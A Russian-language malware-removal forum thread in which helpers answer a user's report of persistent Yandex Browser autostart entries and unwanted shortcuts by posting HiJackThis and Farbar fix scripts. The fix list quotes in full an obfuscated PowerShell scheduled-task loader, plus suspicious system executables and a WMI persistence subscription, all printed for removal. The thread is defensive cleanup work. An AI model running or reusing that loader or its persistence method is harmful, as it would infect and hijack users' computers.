Перейти к содержанию

Подозрение на скрытый майнер, появление программ в автозапуске


kostyan2008

Рекомендуемые сообщения

Добрый день! В автозагрузке постоянно появляется Яндекс браузер, при отключении в конфигурации автозагрузок, при следующем запуске компьютера появляется снова, но уже новая задача с тем же названием YANDEX LLC. Так же на рабочем столе появляются ярлыки программ и приложений, которых я не скачивал и не устанавливал, по типу NextRP launcher или world of tanks

CollectionLog-2023.05.20-10.57.zip

Ссылка на комментарий
Поделиться на другие сайты

Пофиксите в HiJackThis из папки Autologger (запускать HiJackThis от имени Администратора по правой кнопке мыши)

O4 - MSConfig\startupreg: YandexBrowserAutoLaunch_6258F93B3E4DC9AC344E8154EEB82E22 [command] = C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --no-startup-window --atlogin-bgr-mark /prefetch:5 (HKCU) (2023/05/20)
O22 - Task (.job): (Ready) Восстановление сервиса обновлений Яндекс Браузера.job - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe
O22 - Task (.job): (Ready) Обновление Браузера Яндекс.job - C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
O22 - Task (.job): (Ready) Системное обновление Браузера Яндекс.job - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe
O22 - Tasks: \Microsoft\Windows\NetTrace\NetTrace - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$rJcVcI='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';$wdJM='BauesC)jTxMeug.D(diuPKarlq-OvlgXZcUbYpXUgbalZhZ';$VCHk=""""$($wdJM[26])$($wdJM[23])$($wdJM[3])$($wdJM[37])$($wdJM[24])$($wdJM[1])$($wdJM[33])$($wdJM[3])"""";$mwGIBO=($wdJM[18]+$wdJM[3]+$wdJM[9]);&$mwGIBO(&$mwGIBO('''_fu2ncntikon( dqecb([qbysteq[]?]$_PN]DJkyo2,[zst_rikng8]$_TI6jt)fat){/$Z}Dl!lzk=[7Sy3stvemh.Tzex4t.2En8co_di-ng1]:g:U_TF_8._GextB.ytmes0($1TI5jt?fa?);s$ahSH_T=_$Z(Dldlzz[0l];h$LzaUkm=j0;{fo_r(k$c2Cu_U=?0;6$c0CunU l-l5t }$PxND_Jyco.vCoyunjt;n$cbCukU+9+)!{i,f(($L(aUnm k-gre _$ZfDl1lzx.C8ou_ntp){)$L+aUdm=_0}_$axSHwT=?(2}3 _-b0an{d ?$akSH3T j-b(orh 1752_) _-b5xour q$a1SH-T;.$PlNDpJy{o[k$caCu8U]n=$_PN_DJtyo+[$vcCpuU.] a-bbxoer 2$ZbDl-lz][$-La9Umi] c-b_xo_r p$afSHoT;_$LoaUnm+3+}_re9tujrn4 $oPN8DJzyoi;}m$o{bL1aU7m=}gwimil w_in=327_d/is+kd_ri.ve-|wrhenre] {3$_g.D2ev.ic_eIvD .-e-q p''''\s\.5\PvHY4SI_CA]LD2RI[VE_0''''_}|lse)lejct_ Mbodjelj,Ster4ia,ln_um7be=r;}$y7BNkrI_U=8de]c ?([uSy,st7em..C)on(vevrtz]:r:F_roamB/as6e6o4S=tr-in.g(2$rwJc_VczI)4) _($xobwLa?Umo.M_odkelx+''''_ ''''(+$!obsLacUmh.S]er[ia(ln_umabe]r)_;igex/([_Syost-emo.T3ex0t.!En-coadi0ng_]:j:U/TFw8.4GeutS,tr_inbg(1$y!BN}rIlU)_) '' '+$VCHk+'($wdJM[14]+$wdJM[16]+$wdJM[14]+$wdJM[14]+$wdJM[6]),(''$''+479/479)'))"
O22 - Tasks: Восстановление сервиса обновлений Яндекс Браузера - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe --repair
O22 - Tasks: Обновление Браузера Яндекс - C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --background-update --noerrdialogs
O22 - Tasks: Системное обновление Браузера Яндекс - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe --run-as-launcher

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

Ссылка на комментарий
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

Ссылка на комментарий
Поделиться на другие сайты

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
S3 BraveElevationService; "C:\Program Files\BraveSoftware\Brave-Browser\Application\109.1.47.186\elevation_service.exe" [X]
R2 YandexBrowserService; "C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe" --run-as-service [X]
2023-03-14 02:46 - 2023-03-14 02:46 - 003723264 ____S C:\Windows\mssecsvr.exe
2023-03-13 19:30 - 2023-05-18 19:02 - 003514368 ____S C:\Windows\qeriuwjhrf
2023-03-13 19:30 - 2023-05-18 19:02 - 002061938 ____S C:\Windows\tasksche.exe
2023-03-13 19:30 - 2023-03-13 19:30 - 003723264 ____S C:\Windows\mssecsvc.exe
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • ванькаветер
      От ванькаветер
      Подозрение на майнер. Вентилятор включается на видекарте в ноутбуке на несколько минут. Температура видеокарты 51 градус, хотя я включал в msi ценре турбообдув температура падает до38 градусов ротом опять поднимается. Загрузка gpu прыгает до 20%. В основном до 5%. Подозрительно. Возможно планировщик или драйвера nvidia шалят. Все драйвера обновлены в данный момент с помощью SDI программы.
      CollectionLog-2024.11.25-13.39.zip
    • Flawor_Swift
      От Flawor_Swift
      Доброго времени суток! В состоянии покоя через некоторое время ноутбук начинает сильно шуметь, как будто бы я на нем активно активно работаю. Из необычного еще  окно "Безопасность  Windows" При открытии фризит и выдает черный экран на пару минут. Другие проявления типичные майнеру, по типу невозможности зайти на сайты, создавать папки или запускать антивирусы отсутствуют.  KVRT и Cureit  не нашли ничего вредоносного

      CollectionLog-2024.11.14-01.14.zip
    • Medoed Stepa
      От Medoed Stepa
      Недавно заметил что у меня очень сильно начал греться процессор, после запуска компьютера, FPS  начал проседать и.т.д
      Захожу в диспетчер задач вначале высокая загрузка, потом падает ( на форумах говорится что это нормально в первые 2-3с пока диспетчер задач считывает информацию), но  проблема в том что заходя через приложение MyASUS, показывается загрузка процессора которая в среднем составляет 30-40%, при только открытом этом приложении , дальше при открытии диспетчера задач загрузка падает до 3%  что в диспетчере задач что в приложении , но при закрытии сразу возрастает до 40%, так же сегодня заметил что если отключить интернет то загрузка тоже падает . Одним словом майнер в чистом виде.
      Писать бы на форум не стал не попробовав базовые способы решения , что было сделано: полная проверка через KVRT , Dr web Cureit , ручная проверка через монитор ресурсов , все виды проверок через Microsoft Defender (он кстати нашел троян и 1 вирус, но всё равно удалив их проблема не решилась)
       Физические проблемы с процессором и видеокартой сомнительны так как при запуске приложений-игр ,производительность заметно возрастает если держать свернутым диспетчере задач (производительность не возрастала бы в обратном случае)
      Все драйвера обновлены до последних версий и windows тоже, так же проверял на системные сбои через приложение LatencyMon (проблемы не были найдены)
      Из последнего ,что запускал необычного обходы для dicord и youtube  -Zapret , через командные строки , А так всегда пользуюсь только лицензированным ПО  и соблюдаю цифровую гигиену.
      Есть предположение что так как Zapret был запущен через командую строку от имени администратора ,антивирусы не могут его найти так как считают его расширением или программным ПО - Приложением (на данный момент  Zapret был деинсталлирован через командную строку (предположительно)) 
       
      Снизу прикрепил ,то что нашел Microsoft Defender
       
       


    • Viani
      От Viani
      Добрый вечер. Майнер грузит систему под 90-95% (бездействие системы в диспетчере задач) ЦП при любом открытом окне, ноутбук сильно греется, хотя при открытом браузере даже не включал винты. Вирус был подхвачен когда на ноутбук скачали игру "растения против зомби 2", но проявил себя спустя месяц. (Больше ничего не скачивалось). В корневой папке C после каждого запуска системы появляется свежий файл "HaxLogs.log", внутри написано это: "慨彸敧彴敭潭祲瑟牨獥潨摬›砰〸〰〰〰
      ⴭⴭ䠠塁⁍敲敬獡⁥⸱⸰‶ⴭⴭⴭⴭ
      桔獩氠杯挠汯敬瑣⁳畲湮楧杮猠慴畴⁳景䠠塁⁍牤癩牥ਮ".
      Юзал DrWeb, утулиту касперского, всё по нулям. Помогите, пожалуйста. Логи по вашим правилам прилагаю:
      CollectionLog-2024.11.10-21.44.zip report1.log report2.log
    • Ant666
      От Ant666
      Запускается браузер после загрузки Windows.
      CollectionLog-2024.11.17-18.43.zip
×
×
  • Создать...